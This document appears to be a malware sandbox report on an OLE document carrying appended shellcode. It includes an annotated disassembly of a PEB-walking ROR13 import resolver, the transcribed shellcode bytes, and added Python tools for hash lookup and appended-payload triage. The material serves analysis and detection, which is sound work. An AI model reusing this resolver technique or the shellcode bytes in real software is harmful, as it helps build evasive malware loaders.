Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The OLE compound file carries appended bytes that look like executable code, so it most likely serves as a dropper for a secondary malicious executable. The appended code walks the PEB and resolves imports by ROR13 hash, an anti-analysis technique that leaves no API names for static inspection. No document body or script content was available for further analysis; the verdict rests on these static heuristics, not on observed execution.
Heuristics (3)
- PEB access via FS segment (x86) [severity: high, rule SC_PEB_ACCESS]: the code reads the Process Environment Block through fs:[0x30] (TEB.ProcessEnvironmentBlock), the entry point of position-independent loaders that locate modules without any imports.
Disassembly
Attempted x86 opcode disassembly (linear sweep; offsets are positions in the file). Annotations after ';' are the editor's reading of the standard structure offsets.
00028E0E 648b4030    mov eax, dword ptr fs:[eax + 0x30]     ; PEB, assuming eax == 0 on entry (preceding bytes not shown)
00028E12 8b400c      mov eax, dword ptr [eax + 0xc]         ; PEB->Ldr
00028E15 8b701c      mov esi, dword ptr [eax + 0x1c]        ; Ldr->InInitializationOrderModuleList.Flink
00028E18 ad          lodsd eax, dword ptr [esi]             ; eax = first entry's InInitializationOrderLinks (normally ntdll.dll)
00028E19 8b6808      mov ebp, dword ptr [eax + 8]           ; LDR_DATA_TABLE_ENTRY.DllBase (8 bytes past the links) -> ebp
00028E1C 51          push ecx
00028E1D 56          push esi
00028E1E 57          push edi
00028E1F 8b453c      mov eax, dword ptr [ebp + 0x3c]        ; IMAGE_DOS_HEADER.e_lfanew
00028E22 368b542878  mov edx, dword ptr ss:[eax + ebp + 0x78] ; DataDirectory[0].VirtualAddress (export table RVA)
00028E27 03d5        add edx, ebp                           ; -> IMAGE_EXPORT_DIRECTORY
00028E29 52          push edx
00028E2A 8b5220      mov edx, dword ptr [edx + 0x20]        ; AddressOfNames RVA
00028E2D 03d5        add edx, ebp
00028E2F 33c0        xor eax, eax
00028E31 33c9        xor ecx, ecx                           ; ecx = name index
00028E33 41          inc ecx                                ; next_name:
00028E34 8b348a      mov esi, dword ptr [edx + ecx*4]       ; name RVA
00028E37 03f5        add esi, ebp                           ; -> NUL-terminated export name
00028E39 33ff        xor edi, edi                           ; edi = hash accumulator
00028E3B c1cf0d      ror edi, 0xd                           ; hash_loop: rotate right by 13 before each add
00028E3E ac          lodsb al, byte ptr [esi]
00028E3F 03f8        add edi, eax                           ; hash += byte (upper bits of eax are zero)
00028E41 85c0        test eax, eax                          ; NUL terminator ends the name (it is rotated in first)
00028E43 75f6        jne 0x28e3b
00028E45 3bfb        cmp edi, ebx                           ; ebx = target hash, set before this code runs
00028E47 75ea        jne 0x28e33
00028E49 5a          pop edx                                ; export directory
00028E4A 8b5a24      mov ebx, dword ptr [edx + 0x24]        ; AddressOfNameOrdinals
00028E4D 03dd        add ebx, ebp
00028E4F 668b0c4b    mov cx, word ptr [ebx + ecx*2]         ; ordinal of the matched name
00028E53 8b5a1c      mov ebx, dword ptr [edx + 0x1c]        ; AddressOfFunctions
00028E56 03dd        add ebx, ebp
00028E58 8b048b      mov eax, dword ptr [ebx + ecx*4]       ; function RVA
00028E5B 03c5        add eax, ebp                           ; -> resolved function address
00028E5D 5f          pop edi
00028E5E 5e          pop esi
00028E5F 59          pop ecx
00028E60 83f901      cmp ecx, 1
00028E63 7408        je 0x28e6d
00028E65 8bff        mov edi, edi                           ; 8B FF 55 8B EC are the bytes of the standard Windows hotpatch prologue;
00028E67 55          push ebp                               ; a linear sweep cannot tell whether they execute or are a constant
00028E68 8bec        mov ebp, esp                           ; compared against the target's first bytes
00028E6A 83c005      add eax, 5                             ; stepping the resolved address past a 5-byte prologue (consistent with hook evasion)
00028E6D ff          .byte 0xff                             ; listing ends mid-instruction
- PEB API-hash resolver [severity: high, rule SC_API_HASH_RESOLVER]: PEB access followed by ROR13-style hashing of export names, the common position-independent shellcode import resolver. Because the target API is identified by a 32-bit constant rather than a string, the resolved imports are invisible to string and import-table analysis.
Disassembly: identical to the listing under SC_PEB_ACCESS above (00028E0E to 00028E6D); this heuristic fires on the same bytes.
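Added example, not code from the report, the sandbox or the analysed sample: a Python re-implementation of the hash loop at 00028E39 to 00028E43, plus a reverse lookup that turns the 32-bit constant the shellcode expects in ebx into an export name. The candidate export list is an assumption for demonstration; in practice it is built from the export table of the module the shellcode walks (here the first module in initialization order).

```python
"""ROR13 API-name hashing as computed by the loop in the listing above.

Added example for this report; the CANDIDATE_EXPORTS list is a constructed
sample of common ntdll/kernel32 export names, not data from the sample.
"""
from typing import Dict, Iterable, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """32-bit rotate right, matching `ror edi, 0xd` semantics."""
    value &= MASK32
    return ((value >> count) | (value << (32 - count))) & MASK32


def ror13_hash(name: bytes) -> int:
    """Emulate: xor edi,edi / loop: ror edi,13; lodsb; add edi,eax; test eax,eax; jne.

    The rotate happens BEFORE each add, and the terminating NUL is processed
    (rotated in, then 0 added) before the loop exits, so it contributes one
    final rotation. A table built without that NUL step will never match.
    """
    h = 0
    for b in name + b"\x00":
        h = (ror32(h, 13) + b) & MASK32
    return h


def skape_hash(name: bytes) -> int:
    """The other common convention (check for NUL before ror/add).

    It differs from ror13_hash by exactly one trailing rotation, which is why
    a lookup table from one convention silently fails on the other.
    """
    h = 0
    for b in name:
        h = (ror32(h, 13) + b) & MASK32
    return h


# Constructed candidate list for the reverse lookup; extend from a real export table.
CANDIDATE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateFileA", "WriteFile", "WinExec", "CreateProcessA", "ExitProcess",
    "NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtWriteVirtualMemory",
    "NtCreateThreadEx", "LdrLoadDll", "LdrGetProcedureAddress", "RtlExitUserProcess",
]


def build_table(names: Iterable[str]) -> Dict[int, str]:
    """Map hash -> export name for every candidate."""
    return {ror13_hash(n.encode("ascii")): n for n in names}


def resolve(target: int, table: Dict[int, str]) -> Optional[str]:
    """Name the API a target hash (the value compared against edi) refers to."""
    return table.get(target & MASK32)


if __name__ == "__main__":
    table = build_table(CANDIDATE_EXPORTS)
    for name in ("LoadLibraryA", "NtAllocateVirtualMemory"):
        h = ror13_hash(name.encode("ascii"))
        print(f"{name:28s} {h:08x} -> {resolve(h, table)}")
```

To use this against the sample, recover the value loaded into ebx by the code that calls into 00028E0E (it is not part of the listed bytes) and pass it to resolve; a miss against a complete export table of ntdll.dll usually means the caller walked to a different module or uses a different hash convention, which skape_hash lets you check quickly.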
- OLE file has appended executable-looking payload bytes [severity: high, rule OLE_APPENDED_PAYLOAD]: the compound file contains a large high-entropy region beyond the sectors its FAT accounts for, and that region includes shellcode, PE, or loader-API markers. This is a payload-carrier signal, not a specific CVE attribution by itself; which exploit or macro hands control to the appended bytes cannot be determined without the document body.
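Added example, not the sandbox's detection logic: a Python triage script that computes how much of an OLE compound file its FAT actually accounts for, treats everything past that offset as the appended region, measures the region's entropy, and scans it for the byte patterns from the listing above plus generic PE and loader-API markers. The minimal OLE file is constructed inside the script; the appended bytes are the 96 opcode bytes transcribed from the report's disassembly. Marker names are the editor's own.

```python
"""Locate and characterise bytes past the last FAT-allocated sector of an OLE file.

Added example for this report. build_minimal_ole() constructs a three-sector
compound file (header, FAT, directory) purely for demonstration.
"""
import math
import struct
from typing import Dict, List

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD

# Patterns from the disassembly above plus two generic payload markers (names are ours).
MARKERS: Dict[str, bytes] = {
    "peb_fs30":   bytes.fromhex("648b4030"),  # mov eax, fs:[eax+0x30]
    "export_dir": bytes.fromhex("8b5220"),    # mov edx, [edx+0x20]  (AddressOfNames)
    "ror13":      bytes.fromhex("c1cf0d"),    # ror edi, 0xd
    "mz_header":  b"MZ",                      # embedded PE image
    "loadlib":    b"LoadLibrary",             # plaintext loader API name
}


def declared_size(data: bytes) -> int:
    """Header plus every sector up to the highest non-free FAT entry.

    No stream can reach bytes beyond this offset, so that is where an
    appended payload lives in a file that otherwise parses cleanly.
    """
    if len(data) < 512 or data[:8] != OLE_MAGIC:
        raise ValueError("not an OLE compound file")
    sector_shift = struct.unpack_from("<H", data, 0x1E)[0]
    if sector_shift not in (9, 12):
        raise ValueError("unexpected sector shift %d" % sector_shift)
    sector_size = 1 << sector_shift
    per_sector = sector_size // 4
    num_fat = struct.unpack_from("<I", data, 0x2C)[0]
    first_difat = struct.unpack_from("<I", data, 0x44)[0]
    # The first 109 FAT sector numbers sit in the header; the rest are chained via DIFAT sectors.
    fat_sectors = [s for s in struct.unpack_from("<109I", data, 0x4C) if s != FREESECT]
    sect = first_difat
    while sect not in (ENDOFCHAIN, FREESECT) and len(fat_sectors) < num_fat:
        entries = struct.unpack_from("<%dI" % per_sector, data, (sect + 1) * sector_size)
        fat_sectors.extend(s for s in entries[:-1] if s != FREESECT)
        sect = entries[-1]  # last entry of a DIFAT sector links to the next one
    max_sector = -1
    for idx, fs in enumerate(fat_sectors[:num_fat]):
        off = (fs + 1) * sector_size
        if off + sector_size > len(data):
            continue  # truncated FAT sector: skip rather than crash on a damaged file
        for i, entry in enumerate(struct.unpack_from("<%dI" % per_sector, data, off)):
            if entry != FREESECT:
                max_sector = max(max_sector, idx * per_sector + i)
    return (max_sector + 2) * sector_size  # sector n starts at (n + 1) * sector_size


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; packed or encrypted payloads sit near 8, code around 5 to 6."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_markers(data: bytes, start: int) -> Dict[str, List[int]]:
    """Absolute file offsets of every marker occurrence inside data[start:]."""
    region, hits = data[start:], {}
    for name, pat in MARKERS.items():
        offs, pos = [], region.find(pat)
        while pos != -1:
            offs.append(start + pos)
            pos = region.find(pat, pos + 1)
        hits[name] = offs
    return hits


def analyze(data: bytes) -> dict:
    end = declared_size(data)
    appended = data[end:]
    return {"declared_size": end, "appended_bytes": len(appended),
            "appended_entropy": round(shannon_entropy(appended), 2),
            "hits": scan_markers(data, end)}


def build_minimal_ole() -> bytes:
    """Constructed sample: 512-byte header, one FAT sector (0), one directory sector (1)."""
    hdr = bytearray(512)
    hdr[0:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)  # versions, byte order, shifts
    struct.pack_into("<I", hdr, 0x2C, 1)            # number of FAT sectors
    struct.pack_into("<I", hdr, 0x30, 1)            # first directory sector
    struct.pack_into("<I", hdr, 0x38, 0x1000)       # mini stream cutoff
    struct.pack_into("<II", hdr, 0x3C, ENDOFCHAIN, 0)  # no mini FAT
    struct.pack_into("<II", hdr, 0x44, ENDOFCHAIN, 0)  # no DIFAT sectors
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    directory = bytearray(512)
    directory[0:20] = "Root Entry".encode("utf-16-le")
    struct.pack_into("<HB", directory, 0x40, 22, 5)  # name length, STGTY_ROOT
    return bytes(hdr) + fat + bytes(directory)


# Opcode bytes transcribed from the report's listing (00028E0E to 00028E6D).
PAYLOAD = bytes.fromhex(
    "648b4030 8b400c 8b701c ad 8b6808 51 56 57 8b453c 368b542878 03d5 52 8b5220 03d5"
    " 33c0 33c9 41 8b348a 03f5 33ff c1cf0d ac 03f8 85c0 75f6 3bfb 75ea 5a 8b5a24 03dd"
    " 668b0c4b 8b5a1c 03dd 8b048b 03c5 5f 5e 59 83f901 7408 8bff 55 8bec 83c005 ff"
)
SAMPLE = build_minimal_ole() + PAYLOAD

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

On a real file compare declared_size with the file length first: a few hundred trailing bytes of low entropy are common padding, whereas a region of tens of kilobytes with entropy above 7 and any of the code markers is the signal this heuristic describes. The marker scan is deliberately restricted to the appended region so that legitimate strings inside document streams do not count.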